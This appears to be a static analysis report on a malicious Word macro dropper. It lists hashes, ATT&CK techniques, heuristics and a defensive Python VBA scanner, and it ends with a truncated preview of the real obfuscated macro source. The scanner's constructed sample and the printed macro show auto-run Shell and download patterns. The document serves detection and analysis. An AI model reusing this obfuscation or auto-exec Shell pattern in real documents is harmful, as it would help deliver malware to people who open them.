Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ac27910855bb6481…

MALICIOUS

Office (OLE)

Size: 172.0 KB
Created: 2018-02-22 08:35:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 8d8f98091b39706c1a0008a89c09e4f0
SHA-1: 43c9c685f7ec4c3acbdfe65b47988a36287848ed
SHA-256: ac27910855bb648126377452426c84fa7b7f3f0e8045689b1d13260fdf416333
Risk score: 204

Malware Insights

MITRE ATT&CK
T1059.005  Command and Scripting Interpreter: Visual Basic
T1204.002  User Execution: Malicious File
T1566.001  Phishing: Spearphishing Attachment

The critical OLE_VBA_SHELL heuristic indicates that the recovered VBA project calls the Shell() function, which launches an external program from within the macro. Together with the AutoOpen marker, that call runs as soon as the document is opened with macros enabled, with no further user interaction. ClamAV's detection name, Doc.Dropper.Agent-6459390-0, classifies the document as a dropper, which is consistent with the macro assembling and executing a command that fetches and runs a second-stage payload. The macro source is heavily obfuscated: the decoded module consists of randomly named variables, junk arithmetic whose failures are silenced by On Error Resume Next, and short string fragments passed through a helper function together with two numeric arguments, and static triage of the carved macros.bas counted 27 long base64-like blobs. The final command line therefore cannot be read from the source without emulating or detonating the macro. The only URL extracted from the sample, http://schemas.openxmlformats.org/drawingml/2006/main, is the OOXML DrawingML schema namespace found in the document body, not a network indicator; no download address is visible statically. The legacy WordBasic auto-exec marker is the same AutoOpen name seen through a second detector; its description assumes no VBA project was recovered, which is not the case here, so it adds no separate execution surface.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6459390-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6459390-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    The document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source calls the VBA Shell() function, which launches an external program from the document
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The macro project defines AutoOpen, which Word runs automatically when the document is opened with macros enabled
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of old Word macro execution surface; it is not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  54024 bytes
SHA-256: 7c12cfcf0b3afe108b79d6e1149d62c777d23c2e0e7cc1fbbcd591cbe9b7bba4
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 27 long base64-like blob(s).
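The checks the report applied to this sample (the Shell() call, the AutoOpen marker, the embedded-URL listing with its channel label, and the long base64-like blob count reported for the carved macros.bas) can be reproduced over decoded VBA source with a handful of regular expressions. The following scanner is an added example written for this page; it is not the analysis platform's code and not part of oletools. It generalizes the report's checks slightly: it also recognizes the other Office auto-exec entry points and a WScript.Shell object (named VBA_WSCRIPT_SHELL here, which is not one of the report's identifiers), and it tests only string literals for base64 so that long random identifiers such as the ones in the macro above are not counted. The sample module, the 40-character blob threshold, the allowlist of schema hosts, and the host example.invalid are all constructed for illustration; the real macros.bas is not embedded.

```python
"""Static triage of decoded VBA source with plain regular expressions.

Added example for this page; not the analysis platform's or oletools' code.
It reproduces the report's OLE_VBA_SHELL, OLE_VBA_AUTOOPEN, EMBEDDED_URL and
long-base64-blob checks and adds two generalizations (other auto-exec entry
points and WScript.Shell). Thresholds and the sample module are assumptions.
"""
import re
from dataclasses import dataclass, field

BASE64_MIN_LEN = 40  # assumption: the report does not state its blob-length threshold

# Hosts that only appear as XML/OOXML schema namespaces inside Office files
# (assumption: a small allowlist chosen for this example).
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org"}

AUTOEXEC_RE = re.compile(
    r"\b(?:Sub|Function)\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|"
    r"Document_Open|Document_Close|Workbook_Open)\b",
    re.IGNORECASE,
)
# Shell(...) or the statement form Shell "cmd"; the lookbehind keeps
# WScript.Shell / Application.Shell from counting as the VBA Shell function.
SHELL_RE = re.compile(r'(?<!\.)\bShell\b\s*(?=[("])')
WSHELL_RE = re.compile(r"\bWScript\.Shell\b", re.IGNORECASE)
STRING_RE = re.compile(r'"((?:[^"\n]|"")*)"')  # VBA literal; "" escapes a quote
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % BASE64_MIN_LEN)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)

# Constructed sample module that exhibits the patterns the report flags.
SAMPLE_VBA = r'''Attribute VB_Name = "ThisDocument"
Private Sub AutoOpen()
    On Error Resume Next
    Dim blob As String, dl As String
    ' constructed base64-looking blob (52 chars); not a real payload
    blob = "cG93ZXJzaGVsbCAtbm9wIC13IGhpZGRlbiAtZW5jIEFBQUFBQUFB"
    dl = "http://example.invalid/d.exe"
    Set o = CreateObject("WScript.Shell")
    Shell "cmd /c echo " & blob, vbHide
End Sub

Sub Document_Open()
    ' schema namespace in text, the kind of URL the report labels as body text
    Debug.Print "http://schemas.openxmlformats.org/drawingml/2006/main"
End Sub
'''


@dataclass
class VbaTriage:
    autoexec: list = field(default_factory=list)  # auto-exec entry points defined
    shell_call: bool = False                      # VBA Shell() reached
    wscript_shell: bool = False                   # WScript.Shell object created
    base64_blobs: int = 0                         # string literals that look like base64
    urls: list = field(default_factory=list)      # (url, "schema" | "external")
    severity: str = "info"


def rate(t):
    """Worst-finding-wins severity, mirroring the report's labels."""
    if t.shell_call or t.wscript_shell:
        return "critical"
    if t.autoexec:
        return "high"
    if t.base64_blobs or any(kind == "external" for _, kind in t.urls):
        return "medium"
    return "info"


def scan_vba(src):
    t = VbaTriage()
    t.autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)}, key=str.lower)
    t.shell_call = bool(SHELL_RE.search(src))
    t.wscript_shell = bool(WSHELL_RE.search(src))
    # Only string literals are tested for base64, so long random identifiers
    # in obfuscated macros do not inflate the count.
    literals = [m.group(1) for m in STRING_RE.finditer(src)]
    t.base64_blobs = sum(1 for lit in literals if BASE64_RE.search(lit))
    for url in dict.fromkeys(URL_RE.findall(src)):  # de-duplicate, keep order
        host = url.split("/", 3)[2].lower()
        t.urls.append((url, "schema" if host in SCHEMA_HOSTS else "external"))
    t.severity = rate(t)
    return t


def heuristics(t):
    """Map findings onto the identifiers the report uses (plus one added name)."""
    out = []
    if t.shell_call:
        out.append(("OLE_VBA_SHELL", "critical"))
    if t.wscript_shell:
        out.append(("VBA_WSCRIPT_SHELL", "critical"))  # added name, not the report's
    if t.autoexec:
        out.append(("OLE_VBA_AUTOOPEN", "high"))
    if t.base64_blobs:
        out.append(("EXTRACTED_FILE_STATIC_TRIAGE", "info"))
    if t.urls:
        out.append(("EMBEDDED_URL", "info"))
    return out


if __name__ == "__main__":
    result = scan_vba(SAMPLE_VBA)
    print(result.severity, heuristics(result))
    for url, kind in result.urls:
        print("URL", url, kind)
```

Feed scan_vba() the VBA source that olevba extracts from a sample; the schema allowlist is what keeps a namespace URL like the one in this report from being reported as an external contact point, and the string-literal restriction is what keeps a base64-looking count honest on heavily obfuscated code.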
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YUDhBCOSoTpYG"
Function zjVJGLPjMEv()
On Error Resume Next
OkOtzPbwP = "IonrRdq% tes&&!%ITUIVJlQQCMlQ"
PtOXcbi = kfvPFzumJJDucu = ADnjVMnN - sjcCGLq * 9146728 + CBool(1407496) - aEljr * Atn(3843032 + ChrB(QYwzRVVBVwOLNk) + ShXWXsjzSInaUN * 2872535)
RUzMOhRk = wPavPQQa = HBkPbkt - dmEMVwCk * 5088304 + CBool(5692714) - ivAnGcSwnphB * Atn(3091357 + ChrB(JQqviqYtJraKIa) + XLoncvSG * 2596690)
VrOBpoATl = (GRDHuwaVV) + hghbjJKfvkKs(OkOtzPbwP, 14, 12)
AwubSjBFMK = "ckrjdnoHkfITJUwdNpes&&s=ajJlAijIrPaCOjaUpo"
MviSI = OXabc = EHwNcqJNcjcQa - jsSVitPdwzviNd * 6604787 + CBool(5601492) - soSlqG * Atn(1803384 + ChrB(YLIFoUoGz) + VEEwjbbJ * 9277673)
iRwSMjqkUOJ = wcjfzbjb = MslJwG - GXJfGYNJMYD * 9103721 + CBool(1011032) - JhKqZvidFMkNz * Atn(7541477 + ChrB(kvGqAVDzRM) + PXSbYoWQDL * 5115483)
VPCHzGXO = (nJnGbvloPMj) + hghbjJKfvkKs(AwubSjBFMK, 19, 6)
fuoYcm = "GipJuh%4rav% teYiTqQiTj"
CMuKjQ = rSTfOMYnmldpGC = ZwtYQ - wWZzJLL * 3230569 + CBool(5705634) - JbcmiwIumdCDho * Atn(1840106 + ChrB(VGEVlw) + mtvujEANXJmTOd * 3185633)
iLHAo = bpzmmIvpl = zqEMIMLjqsiEc - lQfuuVvjFjdfm * 2353000 + CBool(1721902) - wGJqEKIKBa * Atn(1533402 + ChrB(nXoWNJAVdAv) + uTlVjcaz * 4467965)
lzZpNB = (ZKDdSzutY) + hghbjJKfvkKs(fuoYcm, 9, 9)
BnVun = "iKfGkn3rav%!!%8rajtidVmhbjAEFo"
mwSvz = EiipDlYq = jqOLVLwOBVaMf - ZmZXtQmGwiHzs * 9627090 + CBool(3998624) - BLXHiKaojJuGT * Atn(6729593 + ChrB(GZoECiOfZC) + skDVTAtHTP * 7953407)
jOLmvJLr = MPMkqkVjn = CBaDtSP - fzEFRqkLpuMM * 2946083 + CBool(2455935) - BcppuYvE * Atn(4249793 + ChrB(dhCvPHbrjjsSG) + WzfubUazqkYbDc * 4005187)
FQaYrK = (ucvllbHUt) + hghbjJKfvkKs(BnVun, 14, 11)
ctrOdWWRUq = "jJJTwKTPTkRqzFTAjVHizlMl!%6rav%Z"
fFUjIjzNS = iGhisqw = PjCpwwBXkEzJAi - pacDzrEaOszm * 1947752 + CBool(1963557) - rvATP * Atn(8056997 + ChrB(pkIbFukVwLwUsH) + nwFKJowA * 1955077)
rFLivVzk = NhMBIhTwslsuW = JpstmpqRvbIB - EjIsjwk * 8468947 + CBool(2562451) - UqidXzWXt * Atn(5482379 + ChrB(BTwCOUBv) + ktHTOPksIvmu * 9292828)
tJPUMq = (ksiPoIiPZ) + hghbjJKfvkKs(ctrOdWWRUq, 2, 7)
ffLsKE = "bdpziShEmv%!!%7rav%!&&ljCUKkIwUkk"
XOCLVqXCw = NGwAnCEr = bjmajYbiJJ - aTrMzANtk * 2293568 + CBool(4811259) - DiIXzTJvFLTNk * Atn(9259940 + ChrB(OlMMFMbstPkBmo) + HPCmjva * 229516)
TjoXCz = KzOSOzicDD = IYzThblOIPSWGu - EKzMA * 7647536 + CBool(6920520) - BFwIiukHwip * Atn(593613 + ChrB(PiFHKMsMscI) + KvTiqDLYn * 9653882)
jirGQ = (XDIMSSYEP) + hghbjJKfvkKs(ffLsKE, 11, 14)
UKLRt = "NYapSQmaQGAv% tes&&pJ"
VDXZkEs = ZqWSuzfcicFPW = ZMfEVOk - PVZALvEzujHi * 6459596 + CBool(7599207) - qsOuuYtKXMHt * Atn(4645831 + ChrB(uhRGob) + stmkY * 7166863)
rjsXXm = YHsjmXpMGUq = VKCoDBf - zzqXsMozwbKW * 7626532 + CBool(2165652) - PUaHAThazQdF * Atn(8134243 + ChrB(FjiswiZRUnajr) + iJTXKZm * 3833638)
uWuGHScNzcj = (jTHUXHToQ) + hghbjJKfvkKs(UKLRt, 2, 9)
iJCSW = "tjQjfzSVtrdCKUTIPjCtriHudlZ%UbrWsuz"
nbdcPh = FGYMDQ = PbzjQVRD - GEjMztZ * 3136123 + CBool(4075518) - Mhbwi * Atn(412775 + ChrB(UADmz) + mqWMRjvqKi * 250266)
hCCXEmmKhA = aLlJLj = rDEjoc - iPBQAbGb * 8860358 + CBool(4189205) - jIjZKCwarH * Atn(8253063 + ChrB(LpWdIah) + ikAEfp * 8796384)
znjNoC = (ufVSZtGPGzH) + hghbjJKfvkKs(iJCSW, 8, 1)
DXMpLjqTY = "UVPNZWKfLjuwvnmsZQdSMSMsCbvjkTiQuCc=%7rav% owb"
qjYXC = rawRLOUpLXo = UzubiDR - lCGFpC * 5671417 + CBool(8056287) - ZiudY * Atn(1848690 + ChrB(mwoKDEI) + FqtDPpwrqLvpT * 8267592)
IijZCCd = Ikiompuhwo = pkOGFjuQzzJ - aLcqDRcUq * 9093195 + CBool(4323046) - aYPVBLIwPfA * Atn(2448254 + ChrB(kFOuDrcwKE) + JwqQUTttNi * 6191988)
fKvQqHaa = (aAzRPjiYbSsC) + hghbjJKfvkKs(DXMpLjqTY, 4, 8)
FTukrMQRic = "mCjprkvEEcQQaaljTrKtoNqquAzbGXp u"
KzOQvNqiu = EzzIwOKV = SznVCjQf - nMTHbllAnBMdR * 1585627 + CBool(3347784) - oGqKDCCHvtULP * Atn(2236390 + ChrB(plYcavzXOW) + bIJoApWiNaZUrk * 1993858)
jdzzIa = LhQakba = ssjrvricn - btzHtf * 801
... (truncated)